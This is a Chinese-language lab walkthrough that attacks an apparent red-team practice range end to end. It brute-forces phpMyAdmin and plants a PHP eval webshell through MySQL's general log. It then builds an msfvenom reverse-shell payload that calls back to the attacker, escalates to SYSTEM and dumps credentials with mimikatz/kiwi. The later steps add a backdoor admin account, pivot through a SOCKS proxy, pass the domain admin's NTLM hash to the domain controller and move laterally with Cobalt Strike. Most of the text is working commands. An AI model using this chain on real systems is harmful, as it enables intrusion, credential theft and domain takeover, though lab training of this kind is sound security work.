Web渗透测试对靶机注入shell

文章目录

Web渗透测试对靶机注入shell
- 1、寻找目标信息
- - netdiscover扫描
  - nmap扫描
  - 利用御剑后台进行扫描
- 2、对登录页面进行暴力破解
- - 启动burp suite对目标网页进行拦截
  - 对目标进行暴力破解
- 3、进入phpmyadmin界面
- - 查看主页信息
  - 对目标信息进行渗透处理
  - - 查看日志是否打开
    - 创建日志文件getshell
- 4、用中国蚁剑进行连接
- - 建立连接
  - 用kali生成木马文件
  - - 注意
  - 把生成的文件上传到服务器
  - 用kali进行监听
  - - 用中国蚁剑运行程序
- 5、后渗透阶段
- - 查看当前角色
  - 提权
  - 迁移进程
  - 获取账号密码
  - 加载 kiwi模块
  - - 用法：
  - **远程桌面登录**
  - - 用户添加失败
    - 去中国蚁剑进行添加
    - 用MobaXterm进行远程连接
  - **添加路由、挂Socks5代理**
  - 连接代理
  - - 端口修改
    - 把meterpreter 放在后台运行
    - - 返回meterpreter
  - 内网主机信息收集
  - 中国蚁剑终端使用命令
  - 内网存活主机服务探测（合集）
- 6.内网横向渗透
- - 哈希传递攻击
  - 在meterpreter中运行
  - - 运行命令
    - 中国蚁剑上运行
    - - 执行第二台机器上的命令
- 7.使用cobaltstike联动MSF
- - 安装cobaltstike
  - - Cobaltstrike简介
  - 开启cobaltstike服务
  - - kali上的操作
    - 物理机上操作
  - 开启监听
  - - 添加监听
    - 查看添加
    - kali里面的操作
    - 返回cobaltstrike进行查看
  - 建立会话交互
  - 查看命令
  - 抓取密码
  - - 得到密码
    - 查看密码
  - 横向移动：
  - - 新建监听器
    - 横向移动目标机
    - - 查看网络拓扑图
      - 横向移动第2个目标机
      - 查看网络拓扑图

1、寻找目标信息

netdiscover扫描

打开kali，使用root权限，输入命令

netdiscover

目标主机为显示 VMare的IP地址得到目标主机IP地址为：192.168.0.4

nmap扫描

输入命令

nmap -sV -O -T4 192.168.0.4

发现目标主机有端口3306是打开的

利用御剑后台进行扫描

输入域名（就是目标IP地址）：192.168.0.4

得到网页地址：phpMyAdmin

网页界面如下

2、对登录页面进行暴力破解

启动burp suite对目标网页进行拦截

对目标进行暴力破解

首先，单击【鼠标右键】–【发送给测试器】–点击【Intruder】
进入intruder界面后，点击【Positions】
然后点击【清除】把变量都清楚了
选中【admin】（username和password）后面的值，单击【添加】，把要进行暴力破解的变量进行添加
下拉攻击类型选中【Clusterbomb】

然后点击【Payload】
有效负载集为1载入Username.txt文件中的数据
有效负载集为2载入Password.txt文件中的数据
然后点击【开始攻击】:程序自动进行暴力破解
匹配用户名和密码
- 破解得到用户名为：root
- 密码为：root

3、进入phpmyadmin界面

查看主页信息

对目标信息进行渗透处理

查看日志是否打开

点击【变量】
- 查看是否开启日志和日志地址

创建日志文件getshell

进入SQL界面
#set global general_log=on; #开启日志
set global general_log_file = 'C:/phpstudy/www/xxb.php'; #设置指定文件为网址日志存放文件
select '<?php @eval($_POST["xxb"]);?>';

下面图片是先前截的图

再次进入【变量】

把general log_file的路径中的文件名换成刚才新建的文件名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

4、用中国蚁剑进行连接

建立连接

注意后缀名和密码

点击测试连接–连接成功–保存这个状态

用kali生成木马文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.134 LPORT=4444 -f exe -o /home/kali/shell.exe

注意

LHOST的IP地址

和/home/kali/shell.exe的路径和文件名

建议把文件名改成自己想的名字

把生成的文件上传到服务器

用kali进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.59.134
set lport 4444
run

用中国蚁剑运行程序

去kali看看

入侵成功

5、后渗透阶段

查看当前角色

getuid

提权

提升权限

这里由于获得的直接是adminsitrator权限，所以可以直接提到system。在真实环境中，这里很多时候都是一个普通用户权限，需要我们去提权。

getsystem #进行提权
getuid

迁移进程

我们目前shell是32位的程序，需要将meterpreter迁移到64位的程序上面而且是system权限运行，否则很多命令执行不了

ps  #查看进程信息

找到 svchost.exe程序的进程号为644

migrate 644

获取账号密码

hashdump    # 获取密码哈希值
run windows/gather/smart_hashdump  #导出密码哈希值

加载 kiwi模块

mimikatz模块已经合并为kiwi模块

输入help查看具体用法
meterpreter > load kiwi
creds_all

用法：

load kiwicreds_all：列举所有凭据
creds_kerberos：列举所有kerberos凭据
creds_msv：列举所有msv凭据
creds_ssp：列举所有ssp凭据
creds_tspkg：列举所有tspkg凭据
creds_wdigest：列举所有wdigest凭据
dcsync：通过DCSync检索用户帐户信息
dcsync_ntlm：通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create：创建黄金票据
kerberos_ticket_list：列举kerberos票据
kerberos_ticket_purge：清除kerberos票据
kerberos_ticket_use：使用kerberos票据
kiwi_cmd：执行mimikatz的命令，后面接mimikatz.exe的命令
lsa_dump_sam：dump出lsa的SAM
lsa_dump_secrets：dump出lsa的密文
password_change：修改密码
wifi_list：列出当前用户的wifi配置文件
wifi_list_shared：列出共享wifi配置文件/编码

远程桌面登录

这里我们已经获得了administrator的账号和密码，现在我们既可以使用administrator账号登录，也可以新建账号登录(不建议直接用administrator身份登录，因为这样动静比较大，直接把管理员给挤掉，导致被发现)

新建账户开启3389 服务

启用远程桌面
run post/windows/manage/enable_rdprun post/windows/manage/enable_rdp USERNAME=admin PASSWORD=123456建议把用户名换一下

用户添加失败

添加失败就换另一种方法试试

#错误代码
Account could not be created
[-] Error:
[*] The following Error was encountered: NameError undefined local variable or method `addusr_out' for #<Msf::Modules::Post__Windows__Manage__Enable_rdp::MetasploitModule:0x00007f577245bb88>
Did you mean?  add_group
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20211215132940_default_192.168.0.4_host.windows.cle_534939.txt

去中国蚁剑进行添加

net user xxb1 123456/add  #添加用户名和密码
net user xxb1  #使用xxb1用户
net localgroup administrators xxb1  /add #把用户名添加到管理员组

用MobaXterm进行远程连接

添加路由、挂Socks5代理

由于我们要进一步扫描内网主机，但是由于不在一个网段上面，所以扫不到的，只能添加路由挂代理扫描。

添加路由的目的是为了让我们的MSF其他模块能访问内网的其他主机

我们知道另外一个网卡的IP是192.168.52.143

run get_local_subnets  #获取目标内网相关信息
run autoroute -s 192.168.53.0/24  #添加路由
run autoroute -p    #查看路由

连接代理

端口修改

在kali终端里面

首先修改

vim /etc/proxychains4.conf

修改端口：

socks5 127.0.0.1 1080

把meterpreter 放在后台运行

background

use auxiliary/server/socks_proxy   #使用代理模块
show options   #保持默认即可
run

返回meterpreter

show sessions #查看sessions
sessions 1  #看数字对应的

内网主机信息收集

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机

这里我用了第三个扫描, 速度很慢

use auxiliary/scanner/netbios/nbname
options
set rhosts 192.168.52.0/24
run

这个网段一共有三台主机

中国蚁剑终端使用命令

靶场环境有问题，好多命令不能执行

在hosts文件加入

192.168.52.138 owa.god.org

net time /domain        #查看时间服务器
net user /domain        #查看域用户
net view /domain        #查看有几个域
net group "domain computers" /domain         #查看域内所有的主机名
net group "domain admins"   /domain          #查看域管理员
net group "domain controllers" /domain       #查看域控
net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域

从域信息收集可以得到以下信息：

域：god.org
域内有三个用户：administrator、ligang、liukaifeng01 （krbtgt密钥分发账户）
域内有三台主机：DEV1（这台主机不在此环境里面）、ROOT-TVI862UBEH(192.168.52.141)、STU1(192.168.52.143)
域控：OWA(192.168.52.138)
域管理员：administrator

由此可见，我们现在获得的即是域管理员权限。此环境内还有一台ROOT-TVI862UBEH(192.168.52.141)和域控OWA(192.168.52.138)。

内网存活主机服务探测（合集）

根据扫描的端口进行相应的模块扫描

auxiliary/scanner/ftp/ftp_version            #发现内网ftp服务，基于默认21端口
auxiliary/scanner/ssh/ssh_version            #发现内网ssh服务，基于默认22端口
auxiliary/scanner/telnet/telnet_version      #发现内网telnet服务，基于默认23端口
auxiliary/scanner/dns/dns_amp                #发现dns服务，基于默认53端口
auxiliary/scanner/http/http_version          #发现内网http服务，基于默认80端口
auxiliary/scanner/http/title                 #探测内网http服务的标题
auxiliary/scanner/smb/smb_version            #发现内网smb服务，基于默认的445端口
auxiliary/scanner/mssql/mssql_schemadump     #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump     #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version        #发现内网mysql服务，基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner            #发现内网RDP服务，基于默认3389端口
auxiliary/scanner/redis/redis_server         #发现内网Redis服务，基于默认6379端口
auxiliary/scanner/db2/db2_version            #探测内网的db2服务，基于默认的50000端口
auxiliary/scanner/netbios/nbname             #探测内网主机的netbios名字

#发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version #发现内网mysql服务，基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner #发现内网RDP服务，基于默认3389端口
auxiliary/scanner/redis/redis_server #发现内网Redis服务，基于默认6379端口
auxiliary/scanner/db2/db2_version #探测内网的db2服务，基于默认的50000端口
auxiliary/scanner/netbios/nbname #探测内网主机的netbios名字
``

6.内网横向渗透

在对内网主机进行信息收集后，接下来我们就是要对内网主机发动攻击。

哈希传递攻击

在域环境内，只有获得了域管理员的哈希才可以攻击。我们得到了域管理员administrator的哈希，在这里我们就可以用哈希传递攻击了。

在前面获得了域管理员 administrator 的NTLM哈希为：

a4ee66cc11243b7741dbb83262e7eba4

NTLM: 就是NT的哈希值，前面的章节已经介绍过

借助mimitkatz哈希传递工具

通过蚁剑上传到 web目录!

在meterpreter中运行

 shell #取得对服务器的某种权限
chcp 65001 #显示或设置活动代码页编号
cd c:\phpstudy\www

运行命令

mimikatz.exe

privilege::debug  #提升权限

#开始 Pass-The-Hash(hash传递攻击域控服务器  也就是 192.168.52.138）
#格式sekurlsa::pth  /user: 用户名 /domain:域控名 /ntlm: NTLM哈希
sekurlsa::pth /user:administrator /domain:"god.org" /ntlm:a4ee66cc11243b7741dbb83262e7eba4

exit 退出

中国蚁剑上运行

我们直接远程执行域控服务器上的命令

以下所有的命令是在跳板机上执行。

这里要在中国蚁剑上面执行，在msf里面会失败

dir \\192.168.52.138\c$       #查看 C盘目录里面的文件  \\就是网络路径   $就是 根目录的意思
或者
dir \\owa\c$

执行第二台机器上的命令

dir \\192.168.52.141\c$

7.使用cobaltstike联动MSF

安装cobaltstike

Cobaltstrike简介

Cobalt Strike是一款美国Red Team开发的渗透测试神器，常被业界人称为CS。。
最近这个工具大火，成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式，集成了提权，凭据导出，端口转发，socket代理，office攻击，文件捆绑，钓鱼等功能。同时，Cobalt Strike还可以调用Mimikatz等其他知名工具，因此广受黑客喜爱。
项目官网:https://www.cobaltstrike.com

早期版本CobaltSrtike依赖Metasploit框架，而现在Cobalt Strike已经不再使用MSF而是作为单独的平台使用，它分为客户端(Client)与服务端(Teamserver)，服务端是一个，客户端可以有多个，团队可进行分布式协团操作。

3.13版本文件架构如下。

│ Scripts 用户安装的插件
│ Log 每天的日志
│ c2lint 检查profile的错误异常
│ cobaltstrike
│ cobaltstrike.jar 客户端程序
│ icon.jpg LOGO
│ license.pdf 许可证文件
│ readme.txt
│ releasenotes.txt
│ teamserver 服务端程序
│ update
│ update.jar 更新程序
└─third-party 第三方工具，里面放的vnc dll

开启cobaltstike服务

kali上的操作

把压缩包传到kali里面

unzip cobaltstrike3.14.zip
cd cobaltstrike3.14
chmod +x teamserver
./teamserver 192.168.59.134 123456 # 启动 服务端格式为【./teamserver 你的kaliIP 密码】

物理机上操作

在物理机上打开CobaltSrtike.exe文件

连接成功界面

开启监听

在CobaltStrike上开启一个监听

添加监听

查看添加

kali里面的操作

一定是渗透连接到主机之后，挂起meterpreter才可以进行以下命令

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #默认情况下，payload_inject执行之后会在本地产生一个新的handler，由于我们已经有了一                                   个，所以不需要在产生一个，所以这里我们设置为true
set lhost 192.168.0.32        #cobaltstrike监听的ip   就是服务端的IP
set lport 14444                 #cobaltstrike监听的端口
set session 1                   #这里是获得的session的id
exploit

返回cobaltstrike进行查看

我们打开cs 可以看到主机已经上线

建立会话交互

鼠标右键 —会话交互

因为60秒执行一次命令，要等待的时间太长我们改为2 秒，实战中不能改的太短，太短会引起防火墙或者杀软注意

在最下面 beacon 输入 sleep2

查看命令

输入 help查看命令

抓取密码

输入下面命令抓取密码

logonpasswords

下面信息太长

我们去下一张图看一下主要信息

得到密码

可以得到Administrator的

密码为

HONGRISEC@2019

查看密码

横向移动：

鼠标右键网络探测

探测此网络下的其他主机

新建监听器

这里我们新建一个监听器
攻击载荷我们选择带有smb 的
端口任意设置

横向移动目标机

点击收集到的目标，就是上面箭头我们来到了，含有目标机的界面

然后我们先横向移动到 ROOT这台机器

选中我们刚才新建的那个监听

查看网络拓扑图

出现下图说明已经成功

横向移动第2个目标机

进行第二个目标机横向移动，和上面步骤一致

查看网络拓扑图

得到网络拓扑图如下

此次实验已圆满结束，有问题的小伙伴可以在评论区留言。